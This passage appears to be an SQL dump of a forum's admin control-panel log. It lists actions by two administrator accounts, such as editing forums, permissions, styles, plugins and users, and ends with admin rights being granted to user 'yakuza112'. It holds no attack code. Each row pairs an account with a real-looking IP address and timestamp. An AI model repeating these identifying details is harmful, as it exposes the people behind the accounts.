(205, 1, 1420396339, 'forum.php', 'update', 'forum id = 7', '46.146.211.11'),
(206, 1, 1420396340, 'forum.php', 'modify', 'forum id = 7', '46.146.211.11'),
(207, 1, 1420396342, 'forum.php', 'edit', 'forum id = 22', '46.146.211.11'),
(208, 1, 1420396344, 'forum.php', 'modify', 'forum id = 7', '46.146.211.11'),
(209, 1, 1420396347, 'forum.php', 'edit', 'forum id = 23', '46.146.211.11'),
(210, 1, 1420396361, 'forum.php', 'edit', 'forum id = 22', '46.146.211.11'),
(211, 1, 1420396364, 'forum.php', 'update', 'forum id = 22', '46.146.211.11'),
(212, 1, 1420396367, 'forum.php', 'modify', 'forum id = 22', '46.146.211.11'),
(213, 1, 1420396482, 'forum.php', 'edit', 'forum id = 19', '46.146.211.11'),
(214, 1, 1420396486, 'forum.php', 'update', 'forum id = 19', '46.146.211.11'),
(215, 1, 1420396487, 'forum.php', 'modify', 'forum id = 19', '46.146.211.11'),
(216, 1, 1420396511, 'forumpermission.php', 'modify', '', '46.146.211.11'),
(217, 1, 1420396530, 'forumpermission.php', 'quickset', 'forum id = 19', '46.146.211.11'),
(218, 1, 1420396532, 'forumpermission.php', 'quickset', 'forum id = 19', '46.146.211.11'),
(219, 1, 1420396534, 'forum.php', 'modify', '', '46.146.211.11'),
(220, 1, 1420396540, 'forumpermission.php', 'modify', '', '46.146.211.11'),
(221, 1, 1420396541, 'forumpermission.php', 'quickset', 'forum id = 19', '46.146.211.11'),
(222, 1, 1420396542, 'forumpermission.php', 'modify', 'forum id = 19', '46.146.211.11'),
(223, 1, 1420396545, 'forumpermission.php', 'quickset', 'forum id = 1', '46.146.211.11'),
(224, 1, 1420396546, 'forumpermission.php', 'modify', 'forum id = 1', '46.146.211.11'),
(225, 1, 1420396548, 'forumpermission.php', 'quickset', 'forum id = 1', '46.146.211.11'),
(226, 1, 1420396549, 'forumpermission.php', 'modify', 'forum id = 1', '46.146.211.11'),
(227, 1, 1420396553, 'forumpermission.php', 'quickset', 'forum id = 17', '46.146.211.11'),
(228, 1, 1420396554, 'forumpermission.php', 'modify', 'forum id = 17', '46.146.211.11'),
(229, 1, 1420396557, 'forumpermission.php', 'quickset', 'forum id = 6', '46.146.211.11'),
(230, 1, 1420396558, 'forumpermission.php', 'modify', 'forum id = 6', '46.146.211.11'),
(231, 1, 1420396561, 'forumpermission.php', 'quickset', 'forum id = 11', '46.146.211.11'),
(232, 1, 1420396562, 'forumpermission.php', 'modify', 'forum id = 11', '46.146.211.11'),
(233, 1, 1420396565, 'forumpermission.php', 'quickset', 'forum id = 14', '46.146.211.11'),
(234, 1, 1420396566, 'forumpermission.php', 'modify', 'forum id = 14', '46.146.211.11'),
(235, 1, 1420396570, 'forumpermission.php', 'quickset', 'forum id = 14', '46.146.211.11'),
(236, 1, 1420396572, 'forumpermission.php', 'modify', 'forum id = 14', '46.146.211.11'),
(237, 1, 1420396603, 'forumpermission.php', 'edit', 'forumpermission id = 50', '46.146.211.11'),
(238, 1, 1420396606, 'forumpermission.php', 'doupdate', '', '46.146.211.11'),
(239, 1, 1420396607, 'forumpermission.php', 'modify', 'forum id = 19', '46.146.211.11'),
(240, 1, 1420396611, 'forumpermission.php', 'edit', 'forumpermission id = 55', '46.146.211.11'),
(241, 1, 1420396613, 'forumpermission.php', 'doupdate', '', '46.146.211.11'),
(242, 1, 1420396614, 'forumpermission.php', 'modify', 'forum id = 19', '46.146.211.11'),
(243, 1, 1420396618, 'forumpermission.php', 'edit', 'forumpermission id = 54', '46.146.211.11'),
(244, 1, 1420396620, 'forumpermission.php', 'doupdate', '', '46.146.211.11'),
(245, 1, 1420396621, 'forumpermission.php', 'modify', 'forum id = 19', '46.146.211.11'),
(246, 1, 1420396624, 'forumpermission.php', 'edit', 'forumpermission id = 53', '46.146.211.11'),
(247, 1, 1420396627, 'forumpermission.php', 'doupdate', '', '46.146.211.11'),
(248, 1, 1420396630, 'forumpermission.php', 'modify', 'forum id = 19', '46.146.211.11'),
(249, 1, 1420396634, 'forumpermission.php', 'edit', 'forumpermission id = 54', '46.146.211.11'),
(250, 1, 1420396637, 'forumpermission.php', 'doupdate', '', '46.146.211.11'),
(251, 1, 1420396640, 'forumpermission.php', 'modify', 'forum id = 19', '46.146.211.11'),
(252, 1, 1420396657, 'forumpermission.php', 'edit', 'forumpermission id = 54', '46.146.211.11'),
(253, 1, 1420396660, 'forumpermission.php', 'doupdate', '', '46.146.211.11'),
(254, 1, 1420396662, 'forumpermission.php', 'modify', 'forum id = 19', '46.146.211.11'),
(255, 1, 1420396664, 'forumpermission.php', 'edit', 'forumpermission id = 55', '46.146.211.11'),
(256, 1, 1420396666, 'forumpermission.php', 'doupdate', '', '46.146.211.11'),
(257, 1, 1420396667, 'forumpermission.php', 'modify', 'forum id = 19', '46.146.211.11'),
(258, 1, 1420396670, 'forumpermission.php', 'quickset', 'forum id = 19', '46.146.211.11'),
(259, 1, 1420396671, 'forumpermission.php', 'modify', 'forum id = 19', '46.146.211.11'),
(260, 1, 1420396701, 'forumpermission.php', 'quickedit', '', '46.146.211.11'),
(261, 1, 1420396765, 'forumpermission.php', 'doquickedit', '', '46.146.211.11'),
(262, 1, 1420396766, 'forumpermission.php', 'modify', '', '46.146.211.11'),
(263, 1, 1420396801, 'forumpermission.php', 'edit', 'forum id = 19 / usergroup id = 1', '46.146.211.11'),
(264, 1, 1420396805, 'forumpermission.php', 'doupdate', '', '46.146.211.11'),
(265, 1, 1420396806, 'forumpermission.php', 'modify', 'forum id = 19', '46.146.211.11'),
(266, 1, 1420396819, 'forumpermission.php', 'edit', 'forum id = 19 / usergroup id = 8', '46.146.211.11'),
(267, 1, 1420396825, 'forumpermission.php', 'modify', 'forum id = 19', '46.146.211.11'),
(268, 1, 1420396829, 'forumpermission.php', 'edit', 'forum id = 1 / usergroup id = 1', '46.146.211.11'),
(269, 1, 1420396833, 'forumpermission.php', 'doupdate', '', '46.146.211.11'),
(270, 1, 1420396834, 'forumpermission.php', 'modify', 'forum id = 1', '46.146.211.11'),
(271, 1, 1420396838, 'forumpermission.php', 'edit', 'forum id = 17 / usergroup id = 1', '46.146.211.11'),
(272, 1, 1420396842, 'forumpermission.php', 'doupdate', '', '46.146.211.11'),
(273, 1, 1420396843, 'forumpermission.php', 'modify', 'forum id = 17', '46.146.211.11'),
(274, 1, 1420396847, 'forumpermission.php', 'edit', 'forum id = 6 / usergroup id = 1', '46.146.211.11'),
(275, 1, 1420396851, 'forumpermission.php', 'doupdate', '', '46.146.211.11'),
(276, 1, 1420396852, 'forumpermission.php', 'modify', 'forum id = 6', '46.146.211.11'),
(277, 1, 1420396857, 'forumpermission.php', 'edit', 'forum id = 11 / usergroup id = 1', '46.146.211.11'),
(278, 1, 1420396860, 'forumpermission.php', 'doupdate', '', '46.146.211.11'),
(279, 1, 1420396861, 'forumpermission.php', 'modify', 'forum id = 11', '46.146.211.11'),
(280, 1, 1420396866, 'forumpermission.php', 'edit', 'forum id = 14 / usergroup id = 1', '46.146.211.11'),
(281, 1, 1420396869, 'forumpermission.php', 'doupdate', '', '46.146.211.11'),
(282, 1, 1420396871, 'forumpermission.php', 'modify', 'forum id = 14', '46.146.211.11'),
(283, 1, 1420398674, 'forum.php', 'modify', '', '46.146.211.11'),
(284, 1, 1420398723, 'forum.php', 'doorder', '', '46.146.211.11'),
(285, 1, 1420398726, 'forum.php', 'modify', '', '46.146.211.11'),
(286, 1, 1420398759, 'forum.php', 'doorder', '', '46.146.211.11'),
(287, 1, 1420398765, 'forum.php', 'modify', '', '46.146.211.11'),
(288, 1, 1420398777, 'forum.php', 'doorder', '', '46.146.211.11'),
(289, 1, 1420398781, 'forum.php', 'modify', '', '46.146.211.11'),
(290, 1, 1420399450, 'template.php', 'modify', '', '46.146.211.11'),
(291, 1, 1420399454, 'template.php', 'addstyle', '', '46.146.211.11'),
(292, 1, 1420399456, 'template.php', 'files', '', '46.146.211.11'),
(293, 1, 1420399498, 'template.php', 'upload', '', '46.146.211.11'),
(294, 1, 1420399499, 'template.php', 'rebuild', '', '46.146.211.11'),
(295, 1, 1420399500, 'template.php', '', '', '46.146.211.11'),
(296, 1, 1420399515, 'options.php', '', '', '46.146.211.11'),
(297, 1, 1420399518, 'options.php', 'options', '', '46.146.211.11'),
(298, 1, 1420399528, 'options.php', 'dooptions', '', '46.146.211.11'),
(299, 1, 1420399535, 'options.php', 'options', '', '46.146.211.11'),
(300, 1, 1420399709, 'template.php', 'modify', '', '46.146.211.11'),
(301, 1, 1420399712, 'template.php', 'dodisplayorder', '', '46.146.211.11'),
(302, 1, 1420399714, 'template.php', 'modify', '', '46.146.211.11'),
(303, 1, 1420399716, 'template.php', 'modify', '', '46.146.211.11'),
(304, 1, 1420399720, 'template.php', 'modify', '', '46.146.211.11'),
(305, 1, 1420399722, 'css.php', 'edit', 'style id = 2', '46.146.211.11'),
(306, 1, 1420399737, 'css.php', 'update', 'style id = 2', '46.146.211.11'),
(307, 1, 1420399746, 'css.php', 'edit', 'style id = 2', '46.146.211.11'),
(308, 1, 1420399785, 'css.php', 'update', 'style id = 2', '46.146.211.11'),
(309, 1, 1420399788, 'css.php', 'edit', 'style id = 2', '46.146.211.11'),
(310, 1, 1420399804, 'css.php', 'update', 'style id = 2', '46.146.211.11'),
(311, 1, 1420399805, 'css.php', 'edit', 'style id = 2', '46.146.211.11'),
(312, 1, 1420399820, 'css.php', 'update', 'style id = 2', '46.146.211.11'),
(313, 1, 1420399825, 'css.php', 'edit', 'style id = 2', '46.146.211.11'),
(314, 1, 1420399833, 'css.php', 'update', 'style id = 2', '46.146.211.11'),
(315, 1, 1420399840, 'css.php', 'edit', 'style id = 2', '46.146.211.11'),
(316, 1, 1420399845, 'css.php', 'update', 'style id = 2', '46.146.211.11'),
(317, 1, 1420399850, 'css.php', 'edit', 'style id = 2', '46.146.211.11'),
(318, 1, 1420399856, 'css.php', 'update', 'style id = 2', '46.146.211.11'),
(319, 1, 1420399868, 'css.php', 'edit', 'style id = 2', '46.146.211.11'),
(320, 1, 1420401520, 'template.php', 'modify', '', '46.146.211.11'),
(321, 1, 1420401525, 'template.php', 'modify', '', '46.146.211.11'),
(322, 1, 1420404355, 'template.php', 'modify', '', '46.146.211.11'),
(323, 1, 1420404357, 'css.php', 'edit', 'style id = 1', '46.146.211.11'),
(324, 1, 1420404399, 'template.php', 'modify', '', '46.146.211.11'),
(325, 1, 1420404401, 'css.php', 'edit', 'style id = 2', '46.146.211.11'),
(326, 1, 1420404411, 'css.php', 'update', 'style id = 2', '46.146.211.11'),
(327, 1, 1420404417, 'css.php', 'edit', 'style id = 2', '46.146.211.11'),
(328, 1, 1420404436, 'css.php', 'edit', 'style id = 2', '46.146.211.11'),
(329, 1, 1420404437, 'template.php', 'modify', '', '46.146.211.11'),
(330, 1, 1420404465, 'css.php', 'update', 'style id = 2', '46.146.211.11'),
(331, 1, 1420404467, 'css.php', 'edit', 'style id = 2', '46.146.211.11'),
(332, 1, 1420473370, 'options.php', '', '', '46.146.211.11'),
(333, 1, 1420473375, 'options.php', 'options', '', '46.146.211.11'),
(334, 1, 1420473452, 'options.php', 'dooptions', '', '46.146.211.11'),
(335, 1, 1420473455, 'options.php', 'dooptions', '', '46.146.211.11'),
(336, 1, 1420473459, 'options.php', 'dooptions', '', '46.146.211.11'),
(337, 1, 1420473470, 'options.php', 'options', '', '46.146.211.11'),
(338, 1, 1420474239, 'user.php', 'add', '', '46.146.211.11'),
(339, 1, 1420474240, 'user.php', 'add', '', '46.146.211.11'),
(340, 1, 1420474281, 'user.php', 'update', '', '46.146.211.11'),
(341, 1, 1420474283, 'user.php', 'modify', 'user id = 102', '46.146.211.11'),
(342, 1, 1420478989, 'user.php', 'add', '', '46.146.211.11'),
(343, 1, 1420478994, 'options.php', '', '', '46.146.211.11'),
(344, 1, 1420478998, 'options.php', 'options', '', '46.146.211.11'),
(345, 1, 1420479016, 'options.php', 'dooptions', '', '46.146.211.11'),
(346, 1, 1420479018, 'options.php', 'options', '', '46.146.211.11'),
(347, 1, 1420480067, 'options.php', 'dooptions', '', '46.146.211.11'),
(348, 1, 1420480068, 'options.php', '', '', '46.146.211.11'),
(349, 1, 1420480072, 'options.php', 'options', '', '46.146.211.11'),
(350, 1, 1420480077, 'options.php', 'dooptions', '', '46.146.211.11'),
(351, 1, 1420480079, 'options.php', 'options', '', '46.146.211.11'),
(352, 1, 1420480780, 'user.php', 'add', '', '46.146.211.11'),
(353, 1, 1420480793, 'user.php', 'update', '', '46.146.211.11'),
(354, 1, 1420480794, 'user.php', 'update', '', '46.146.211.11'),
(355, 1, 1420480805, 'user.php', 'add', '', '46.146.211.11'),
(356, 1, 1420480850, 'user.php', 'add', '', '46.146.211.11'),
(357, 1, 1420480884, 'user.php', 'add', '', '46.146.211.11'),
(358, 1, 1420480899, 'user.php', 'update', '', '46.146.211.11'),
(359, 1, 1420480901, 'user.php', 'modify', 'user id = 115', '46.146.211.11'),
(360, 1, 1420481213, 'user.php', 'add', '', '46.146.211.11'),
(361, 1, 1420481229, 'user.php', 'update', '', '46.146.211.11'),
(362, 1, 1420481231, 'user.php', 'modify', 'user id = 116', '46.146.211.11'),
(363, 29, 1420482663, 'forum.php', 'modify', '', '93.228.158.124'),
(364, 29, 1420482663, 'forum.php', 'modify', '', '93.228.158.124'),
(365, 29, 1420482668, 'banning.php', 'banuser', '', '93.228.158.124'),
(366, 29, 1420482669, 'user.php', 'find', '', '93.228.158.124'),
(367, 29, 1420482671, 'user.php', 'findnames', '', '93.228.158.124'),
(368, 1, 1420484491, 'user.php', 'add', '', '46.146.211.11'),
(369, 1, 1420484508, 'user.php', 'modify', '', '46.146.211.11'),
(370, 1, 1420484512, 'user.php', 'find', '', '46.146.211.11'),
(371, 1, 1420484514, 'user.php', 'modify', '', '46.146.211.11'),
(372, 1, 1420484517, 'user.php', 'add', '', '46.146.211.11'),
(373, 1, 1420484540, 'user.php', 'update', '', '46.146.211.11'),
(374, 1, 1420484542, 'user.php', 'modify', 'user id = 117', '46.146.211.11'),
(375, 1, 1420647856, 'options.php', '', '', '46.146.211.11'),
(376, 1, 1420647859, 'options.php', '', '', '46.146.211.11'),
(377, 1, 1420647865, 'options.php', 'options', '', '46.146.211.11'),
(378, 1, 1420647870, 'options.php', 'dooptions', '', '46.146.211.11'),
(379, 1, 1420647963, 'options.php', 'options', '', '46.146.211.11'),
(380, 1, 1420648829, 'options.php', '', '', '46.146.211.11'),
(381, 1, 1420648832, 'options.php', '', '', '46.146.211.11'),
(382, 1, 1420648841, 'options.php', 'options', '', '46.146.211.11'),
(383, 1, 1420648846, 'options.php', 'dooptions', '', '46.146.211.11'),
(384, 1, 1420648847, 'options.php', 'options', '', '46.146.211.11'),
(385, 1, 1421049839, 'user.php', 'add', '', '46.146.211.11'),
(386, 1, 1421049856, 'user.php', 'update', '', '46.146.211.11'),
(387, 1, 1421049858, 'user.php', 'modify', 'user id = 132', '46.146.211.11'),
(388, 1, 1421077996, 'user.php', 'modify', '', '46.146.211.11'),
(389, 1, 1421077999, 'user.php', 'find', '', '46.146.211.11'),
(390, 1, 1421078055, 'user.php', 'add', '', '46.146.211.11'),
(391, 1, 1421078070, 'user.php', 'update', '', '46.146.211.11'),
(392, 1, 1421078071, 'user.php', 'modify', 'user id = 133', '46.146.211.11'),
(393, 1, 1421149276, 'user.php', 'add', '', '46.146.211.11'),
(394, 1, 1421149343, 'user.php', 'add', '', '46.146.211.11'),
(395, 1, 1421149418, 'user.php', 'find', '', '46.146.211.11'),
(396, 1, 1421149423, 'user.php', 'modify', '', '46.146.211.11'),
(397, 1, 1421149434, 'user.php', 'add', '', '46.146.211.11'),
(398, 1, 1421149451, 'user.php', 'add', '', '46.146.211.11'),
(399, 1, 1421149452, 'user.php', 'modify', '', '46.146.211.11'),
(400, 1, 1421149452, 'user.php', 'modify', '', '46.146.211.11'),
(401, 1, 1421149453, 'usertools.php', 'merge', '', '46.146.211.11'),
(402, 1, 1421149454, 'user.php', 'modify', '', '46.146.211.11'),
(403, 1, 1421149454, 'user.php', 'modify', '', '46.146.211.11'),
(404, 1, 1421149488, 'user.php', 'modify', '', '46.146.211.11'),
(405, 1, 1421149515, 'user.php', 'find', '', '46.146.211.11'),
(406, 1, 1421149516, 'user.php', 'modify', '', '46.146.211.11'),
(407, 1, 1421149519, 'user.php', 'modify', '', '46.146.211.11'),
(408, 1, 1421149526, 'forum.php', 'modify', '', '46.146.211.11'),
(409, 1, 1421149534, 'moderator.php', 'add', 'forum id = 11', '46.146.211.11'),
(410, 1, 1421149544, 'moderator.php', 'update', 'forum id = 11', '46.146.211.11'),
(411, 1, 1421149547, 'moderator.php', 'add', 'forum id = 11', '46.146.211.11'),
(412, 1, 1421149548, 'forum.php', 'modify', '', '46.146.211.11'),
(413, 1, 1421149549, 'forum.php', 'add', '', '46.146.211.11'),
(414, 1, 1421149550, 'forumpermission.php', 'modify', '', '46.146.211.11'),
(415, 1, 1421149554, 'banning.php', 'banuser', '', '46.146.211.11'),
(416, 1, 1421149556, 'usertools.php', 'merge', '', '46.146.211.11'),
(417, 1, 1421149559, 'user.php', 'modify', '', '46.146.211.11'),
(418, 1, 1421149581, 'forum.php', 'modify', '', '46.146.211.11'),
(419, 1, 1421149924, 'backup.php', 'choose', '', '46.146.211.11'),
(420, 1, 1421150165, 'user.php', 'add', '', '46.146.211.11'),
(421, 1, 1421150196, 'user.php', 'add', '', '46.146.211.11'),
(422, 1, 1421150207, 'user.php', 'modify', '', '46.146.211.11'),
(423, 1, 1421150212, 'user.php', 'add', '', '46.146.211.11'),
(424, 1, 1421150212, 'user.php', 'modify', '', '46.146.211.11'),
(425, 1, 1421150700, 'user.php', 'add', '', '46.146.211.11'),
(426, 1, 1421150716, 'user.php', 'update', '', '46.146.211.11'),
(427, 1, 1421150717, 'user.php', 'modify', 'user id = 134', '46.146.211.11'),
(428, 1, 1421156397, 'user.php', 'add', '', '46.146.211.11'),
(429, 1, 1421156405, 'user.php', 'update', '', '46.146.211.11'),
(430, 1, 1421156407, 'user.php', 'modify', 'user id = 135', '46.146.211.11'),
(431, 1, 1421157372, 'user.php', 'edit', 'user id = 11', '46.146.211.11'),
(432, 1, 1421680414, 'options.php', '', '', '46.146.211.11'),
(433, 1, 1421680417, 'options.php', 'options', '', '46.146.211.11'),
(434, 1, 1421680443, 'options.php', 'options', '', '46.146.211.11'),
(435, 1, 1421680449, 'options.php', 'dooptions', '', '46.146.211.11'),
(436, 1, 1421680451, 'options.php', 'options', '', '46.146.211.11'),
(437, 1, 1421680557, 'options.php', 'options', '', '46.146.211.11'),
(438, 1, 1421681300, 'options.php', '', '', '46.146.211.11'),
(439, 1, 1421681313, 'options.php', 'options', '', '46.146.211.11'),
(440, 1, 1421681321, 'options.php', 'dooptions', '', '46.146.211.11'),
(441, 1, 1421681322, 'options.php', 'options', '', '46.146.211.11'),
(442, 1, 1421681341, 'options.php', 'dooptions', '', '46.146.211.11'),
(443, 1, 1421681343, 'options.php', 'options', '', '46.146.211.11'),
(444, 1, 1421687499, 'template.php', 'findupdates', '', '46.146.211.11'),
(445, 1, 1421687536, 'plugin.php', 'modify', '', '46.146.211.11'),
(446, 1, 1421687543, 'options.php', 'options', '', '46.146.211.11'),
(447, 1, 1421687548, 'options.php', 'dooptions', '', '46.146.211.11'),
(448, 1, 1421687549, 'options.php', 'options', '', '46.146.211.11'),
(449, 1, 1421687553, 'plugin.php', 'modify', '', '46.146.211.11'),
(450, 1, 1421687557, 'plugin.php', 'add', '', '46.146.211.11'),
(451, 1, 1421687574, 'plugin.php', 'add', '', '46.146.211.11'),
(452, 1, 1421687887, 'plugin.php', 'modify', '', '46.146.211.11'),
(453, 1, 1421687893, 'plugin.php', 'modify', '', '46.146.211.11'),
(454, 1, 1421687896, 'plugin.php', 'product', '', '46.146.211.11'),
(455, 1, 1421687931, 'plugin.php', 'files', '', '46.146.211.11'),
(456, 1, 1421687934, 'plugin.php', 'files', '', '46.146.211.11'),
(457, 1, 1421688087, 'plugin.php', 'product', '', '46.146.211.11'),
(458, 1, 1421688096, 'plugin.php', 'files', '', '46.146.211.11'),
(459, 1, 1421688097, 'plugin.php', 'files', '', '46.146.211.11'),
(460, 1, 1421688176, 'plugin.php', 'product', '', '46.146.211.11'),
(461, 1, 1421688182, 'plugin.php', 'productadd', '', '46.146.211.11'),
(462, 1, 1421688206, 'plugin.php', 'product', '', '46.146.211.11'),
(463, 1, 1421688217, 'plugin.php', 'files', '', '46.146.211.11'),
(464, 1, 1421688219, 'plugin.php', 'files', '', '46.146.211.11'),
(465, 1, 1421688240, 'plugin.php', 'files', '', '46.146.211.11'),
(466, 1, 1421688247, 'plugin.php', 'files', '', '46.146.211.11'),
(467, 1, 1421688259, 'plugin.php', 'files', '', '46.146.211.11'),
(468, 1, 1421688265, 'plugin.php', 'doimport', '', '46.146.211.11'),
(469, 1, 1421688268, 'plugin.php', 'files', '', '46.146.211.11'),
(470, 1, 1421688290, 'plugin.php', 'modify', '', '46.146.211.11'),
(471, 1, 1421688297, 'plugin.php', 'product', '', '46.146.211.11'),
(472, 1, 1421688304, 'plugin.php', 'files', '', '46.146.211.11'),
(473, 1, 1421688321, 'plugin.php', 'product', '', '46.146.211.11'),
(474, 1, 1421923992, 'plugin.php', 'files', '', '46.146.211.11'),
(475, 1, 1421924558, 'plugin.php', 'files', '', '46.146.211.11'),
(476, 1, 1421924583, 'plugin.php', 'doimport', '', '46.146.211.11'),
(477, 1, 1421924591, 'plugin.php', 'files', '', '46.146.211.11'),
(478, 1, 1421924594, 'plugin.php', 'product', '', '46.146.211.11'),
(479, 1, 1421924597, 'plugin.php', 'productadd', '', '46.146.211.11'),
(480, 1, 1421924605, 'plugin.php', 'productimport', '', '46.146.211.11'),
(481, 1, 1421924608, 'plugin.php', 'product', '', '46.146.211.11'),
(482, 1, 1421924609, 'plugin.php', 'product', '', '46.146.211.11'),
(483, 1, 1421924614, 'plugin.php', 'productedit', '', '46.146.211.11'),
(484, 1, 1421924719, 'plugin.php', 'product', '', '46.146.211.11'),
(485, 1, 1421924768, 'plugin.php', 'productedit', '', '46.146.211.11'),
(486, 1, 1421924806, 'plugin.php', 'productcode', '', '46.146.211.11'),
(487, 1, 1421924807, 'plugin.php', 'productedit', '', '46.146.211.11'),
(488, 1, 1421932923, 'user.php', 'add', '', '46.146.211.11'),
(489, 1, 1421932930, 'user.php', 'modify', '', '46.146.211.11'),
(490, 1, 1421932935, 'user.php', 'find', '', '46.146.211.11'),
(491, 1, 1421932935, 'user.php', 'edit', '', '46.146.211.11'),
(492, 1, 1421932954, 'user.php', 'update', '', '46.146.211.11'),
(493, 1, 1421933394, 'user.php', 'modify', '', '46.146.211.11'),
(494, 1, 1421933397, 'user.php', 'find', '', '46.146.211.11'),
(495, 1, 1421933416, 'user.php', 'modify', '', '46.146.211.11'),
(496, 1, 1421933418, 'user.php', 'find', '', '46.146.211.11'),
(497, 1, 1421933421, 'user.php', 'find', '', '46.146.211.11'),
(498, 1, 1421933424, 'user.php', 'find', '', '46.146.211.11'),
(499, 1, 1421933428, 'user.php', 'find', '', '46.146.211.11'),
(500, 1, 1421933430, 'user.php', 'find', '', '46.146.211.11'),
(501, 1, 1421933434, 'user.php', 'edit', '', '46.146.211.11'),
(502, 1, 1421933440, 'user.php', 'modify', '', '46.146.211.11'),
(503, 1, 1421933440, 'user.php', 'modify', '', '46.146.211.11'),
(504, 1, 1421933446, 'user.php', 'find', '', '46.146.211.11'),
(505, 1, 1421933446, 'user.php', 'edit', '', '46.146.211.11'),
(506, 1, 1421933452, 'user.php', 'modify', '', '46.146.211.11'),
(507, 1, 1421933452, 'user.php', 'modify', '', '46.146.211.11'),
(508, 1, 1421933453, 'user.php', 'find', '', '46.146.211.11'),
(509, 1, 1421933456, 'user.php', 'edit', '', '46.146.211.11'),
(510, 1, 1421933461, 'user.php', 'modify', '', '46.146.211.11'),
(511, 1, 1421933464, 'user.php', 'find', '', '46.146.211.11'),
(512, 1, 1421933531, 'user.php', 'edit', '', '46.146.211.11'),
(513, 1, 1421933696, 'user.php', 'modify', '', '46.146.211.11'),
(514, 1, 1421933698, 'user.php', 'find', '', '46.146.211.11'),
(515, 1, 1421933701, 'user.php', 'edit', '', '46.146.211.11'),
(516, 1, 1421933730, 'user.php', 'modify', '', '46.146.211.11'),
(517, 1, 1421933732, 'user.php', 'find', '', '46.146.211.11'),
(518, 1, 1421933765, 'user.php', 'modify', '', '46.146.211.11'),
(519, 1, 1421933767, 'user.php', 'find', '', '46.146.211.11'),
(520, 1, 1421933769, 'user.php', 'edit', '', '46.146.211.11'),
(521, 1, 1421933783, 'user.php', 'update', '', '46.146.211.11'),
(522, 1, 1421933787, 'user.php', 'edit', 'user id = 34', '46.146.211.11'),
(523, 1, 1421933795, 'user.php', 'update', 'user id = 34', '46.146.211.11'),
(524, 1, 1421933797, 'user.php', 'modify', 'user id = 34', '46.146.211.11'),
(525, 1, 1421933827, 'user.php', 'find', '', '46.146.211.11'),
(526, 1, 1422122358, 'user.php', 'add', '', '46.146.211.11'),
(527, 1, 1422122370, 'user.php', 'modify', '', '46.146.211.11'),
(528, 1, 1422122374, 'user.php', 'find', '', '46.146.211.11'),
(529, 1, 1422122374, 'user.php', 'edit', 'user id = 1', '46.146.211.11'),
(530, 1, 1422122378, 'user.php', 'modify', '', '46.146.211.11'),
(531, 1, 1422122413, 'user.php', 'find', '', '46.146.211.11'),
(532, 1, 1422122414, 'user.php', 'edit', '', '46.146.211.11'),
(533, 1, 1422122416, 'user.php', 'modify', '', '46.146.211.11'),
(534, 1, 1422122422, 'user.php', 'find', '', '46.146.211.11'),
(535, 1, 1422122433, 'user.php', 'find', '', '46.146.211.11'),
(536, 1, 1422122441, 'user.php', 'find', '', '46.146.211.11'),
(537, 1, 1422122446, 'user.php', 'find', '', '46.146.211.11'),
(538, 1, 1422122449, 'user.php', 'edit', '', '46.146.211.11'),
(539, 1, 1422122460, 'user.php', 'update', '', '46.146.211.11'),
(540, 1, 1422122463, 'user.php', 'edit', '', '46.146.211.11'),
(541, 1, 1422122470, 'user.php', 'modify', '', '46.146.211.11'),
(542, 1, 1422122476, 'user.php', 'find', '', '46.146.211.11'),
(543, 1, 1422122476, 'user.php', 'edit', '', '46.146.211.11'),
(544, 1, 1422122479, 'user.php', 'modify', '', '46.146.211.11'),
(545, 1, 1422122480, 'user.php', 'find', '', '46.146.211.11'),
(546, 1, 1422122483, 'user.php', 'find', '', '46.146.211.11'),
(547, 1, 1422122484, 'user.php', 'find', '', '46.146.211.11'),
(548, 1, 1422122486, 'user.php', 'find', '', '46.146.211.11'),
(549, 1, 1422122496, 'user.php', 'edit', '', '46.146.211.11'),
(550, 1, 1422122507, 'user.php', 'find', '', '46.146.211.11'),
(551, 1, 1422122507, 'user.php', 'edit', '', '46.146.211.11'),
(552, 1, 1422122530, 'user.php', 'modify', '', '46.146.211.11'),
(553, 1, 1422122534, 'user.php', 'find', '', '46.146.211.11'),
(554, 1, 1422122535, 'user.php', 'edit', '', '46.146.211.11'),
(555, 1, 1422122544, 'user.php', 'update', '', '46.146.211.11'),
(556, 1, 1422122548, 'user.php', 'edit', 'user id = 29', '46.146.211.11'),
(557, 1, 1422122561, 'user.php', 'update', 'user id = 29', '46.146.211.11'),
(558, 1, 1422122563, 'user.php', 'modify', 'user id = 29', '46.146.211.11'),
(559, 1, 1422122565, 'adminpermissions.php', 'edit', 'user id = 29 (yakuza112)', '46.146.211.11'),
(560, 1, 1422122586, 'adminpermissions.php', 'update', 'user id = 29 (yakuza112) (0 » 491516)', '46.146.211.11'),
(561, 1, 1422122587, 'adminpermissions.php', '', '', '46.146.211.11'),
(562, 29, 1422122743, 'template.php', 'modify', '', '179.43.134.203'),
(563, 29, 1422122754, 'template.php', 'findupdates', '', '179.43.134.203'),
(564, 29, 1422122761, 'template.php', 'findupdates', '', '179.43.134.203'),
(565, 29, 1422122771, 'plugin.php', 'product', '', '179.43.134.203'),
(566, 29, 1422122781, 'plugin.php', 'modify', '', '179.43.134.203'),
(567, 29, 1422122785, 'plugin.php', 'product', '', '179.43.134.203'),
(568, 29, 1422122846, 'repair.php', 'list', '', '179.43.134.203'),
(569, 29, 1422122848, 'diagnostic.php', 'list', '', '179.43.134.203'),
(570, 29, 1422122903, 'diagnostic.php', 'server_modules', '', '179.43.134.203'),
(571, 29, 1422122907, 'diagnostic.php', 'list', '', '179.43.134.203'),
(572, 29, 1422122909, 'diagnostic.php', 'doversion', '', '179.43.134.203'),
(573, 29, 1422122926, 'diagnostic.php', 'list', '', '179.43.134.203'),
(574, 29, 1422122932, 'diagnostic.php', 'dosysinfo', '', '179.43.134.203'),
(575, 29, 1422122996, 'diagnostic.php', 'list', '', '179.43.134.203'),
(576, 29, 1422123091, 'stats.php', 'index', '', '179.43.134.203'),
(577, 29, 1422123093, 'stats.php', 'top', '', '179.43.134.203'),
(578, 29, 1422123101, 'rssposter.php', 'modify', '', '179.43.134.203'),
(579, 29, 1422123105, 'image.php', 'modify', 'Avatars', '179.43.134.203'),
(580, 29, 1422123117, 'user.php', 'modify', '', '179.43.134.203'),
(581, 29, 1422123124, 'user.php', 'find', '', '179.43.134.203'),
(582, 29, 1422123125, 'user.php', 'edit', '', '179.43.134.203'),
(583, 29, 1422123129, 'user.php', 'modify', '', '179.43.134.203'),
(584, 29, 1422123134, 'user.php', 'find', '', '179.43.134.203'),
(585, 29, 1422123134, 'user.php', 'edit', '', '179.43.134.203'),
(586, 29, 1422123139, 'user.php', 'modify', '', '179.43.134.203'),
(587, 29, 1422123143, 'user.php', 'find', '', '179.43.134.203'),
(588, 29, 1422123143, 'user.php', 'edit', '', '179.43.134.203'),
